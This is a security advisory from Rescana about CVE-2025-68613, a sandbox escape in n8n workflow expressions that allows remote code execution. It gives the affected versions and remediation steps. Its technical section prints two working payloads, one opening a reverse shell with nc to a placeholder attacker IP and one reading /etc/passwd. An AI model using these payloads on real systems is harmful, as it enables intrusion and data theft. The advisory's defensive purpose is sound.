Executive Summary

A critical vulnerability has been identified in the n8n open-source workflow automation platform, tracked as CVE-2025-68613 and assigned a CVSS score of 9.9. This flaw allows authenticated users with workflow creation or editing permissions to execute arbitrary system commands on the underlying server. The impact of this vulnerability is severe, as it can lead to full system compromise, data exfiltration, workflow sabotage, and lateral movement within affected environments. While there is currently no evidence of active exploitation in the wild, the ease of exploitation and the widespread use of n8n make this a high-priority risk for organizations leveraging this platform. Immediate remediation is strongly advised.

Technical Information

The vulnerability, CVE-2025-68613, arises from improper control of dynamically-managed code resources (CWE-913) within the n8n workflow engine. Specifically, the platform allows users to inject JavaScript expressions into workflow definitions. These expressions are evaluated in a context that is insufficiently sandboxed, enabling attackers to escape the intended restrictions and execute arbitrary system-level commands with the privileges of the n8n process.

The attack vector requires the adversary to possess valid credentials with workflow creation or editing permissions. Notably, administrative privileges are not required, significantly lowering the barrier to exploitation in environments with multiple users or weak access controls. The attacker crafts a malicious payload, typically using the ={{ ... }} expression syntax, and inserts it into a workflow node parameter. Upon execution of the workflow, the payload is evaluated and executed on the server.

For example, an attacker could use the following payload to establish a reverse shell:

{{ (function() { try { const cp = this.process.mainModule.require('child_process'); cp.execSync('mkfifo /tmp/f; nc <attacker_ip> 4444 < /tmp/f | /bin/sh > /tmp/f 2>&1; rm /tmp/f'); return 'nc_pipe_reverse_shell_attempted'; } catch(e) { return 'error: '+e.message; } })() }}

Alternatively, sensitive files can be exfiltrated using:

{{ (function() { try { const fs = this.process.mainModule.require('fs'); return fs.readFileSync('/etc/passwd', 'utf8'); } catch(e) { return 'error: '+e.message; } })() }}

The impact of successful exploitation includes, but is not limited to, unauthorized access to sensitive data, manipulation or destruction of workflows, installation of persistent backdoors, and the ability to pivot to other systems within the network.

The vulnerability is mapped to several MITRE ATT&CK techniques, including T1059 (Command and Scripting Interpreter), T1078 (Valid Accounts), and T1569.002 (System Services: Service Execution). These mappings underscore the potential for attackers to leverage this flaw for initial access, privilege escalation, and persistence.

Exploitation in the Wild

As of the latest available intelligence, there are no confirmed reports of public proof-of-concept exploits or active exploitation of this vulnerability in the wild. However, the technical simplicity of the attack, combined with the high privileges granted to workflow creators in n8n, makes this an attractive target for both opportunistic and targeted threat actors. Security researchers and vendors have published detailed technical analyses and proof-of-concept payloads, lowering the barrier for exploitation by less sophisticated attackers.

The risk is particularly acute for internet-facing n8n instances and multi-tenant deployments, where the likelihood of credential compromise or insider threat is elevated. According to eSecurityPlanet, over 100,000 n8n instances may be exposed to this vulnerability, amplifying the urgency for remediation.

APT Groups using this vulnerability

At this time, there is no public evidence attributing exploitation of CVE-2025-68613 to any specific Advanced Persistent Threat (APT) groups. No sector- or country-specific targeting has been observed in open-source threat intelligence, vendor advisories, or MITRE reporting. Nevertheless, the nature of the vulnerability—authenticated remote code execution in a widely adopted automation platform—makes it a likely candidate for future exploitation by both financially motivated cybercriminals and state-sponsored actors. The potential for supply chain compromise, lateral movement, and data exfiltration aligns with the tactics, techniques, and procedures (TTPs) commonly employed by sophisticated threat groups.

Affected Product Versions

The following versions of n8n are affected by CVE-2025-68613:

n8n versions greater than or equal to 0.211.0 and less than 1.120.4, n8n versions greater than or equal to 1.121.0 and less than 1.121.1, and n8n versions greater than or equal to 1.122.0 and less than 1.122.0 are all vulnerable. The vendor has released patches in versions 1.120.4, 1.121.1, and 1.122.0. Organizations running any of the affected versions should prioritize upgrading to a patched release without delay.

Workaround and Mitigation

The only complete remediation for this vulnerability is to upgrade n8n to one of the patched versions: 1.120.4, 1.121.1, or 1.122.0. If immediate upgrade is not feasible, organizations should restrict workflow creation and editing permissions to fully trusted users, harden the deployment environment by limiting the operating system privileges of the n8n process, and restrict network access to the n8n server. Continuous monitoring for suspicious workflow modifications, unexpected system processes, and anomalous outbound network connections is strongly recommended. However, it is important to note that these mitigations are only partial and do not fully address the underlying vulnerability. Upgrading to a patched version remains the only comprehensive solution.

References

For further technical details and official advisories, please consult the following resources:

The NVD Entry for CVE-2025-68613 provides the official vulnerability record. The n8n Security Advisory and Patch details the vendor's response and remediation steps. The Orca Security Technical Analysis offers an in-depth breakdown of the exploit mechanics. Additional coverage can be found at eSecurityPlanet, and the GitHub Patch Commits provide technical details of the code changes. For threat modeling, refer to MITRE ATT&CK TTPs and CWE-913.

Rescana is here for you

Rescana is committed to helping organizations manage third-party risk and maintain robust cybersecurity postures. Our TPRM platform empowers you to continuously monitor, assess, and mitigate risks across your digital supply chain, providing actionable intelligence and automated workflows to stay ahead of emerging threats. If you have any questions about this advisory or require further assistance, please contact us at ops@rescana.com. We are here to support your security operations and help you navigate the evolving threat landscape.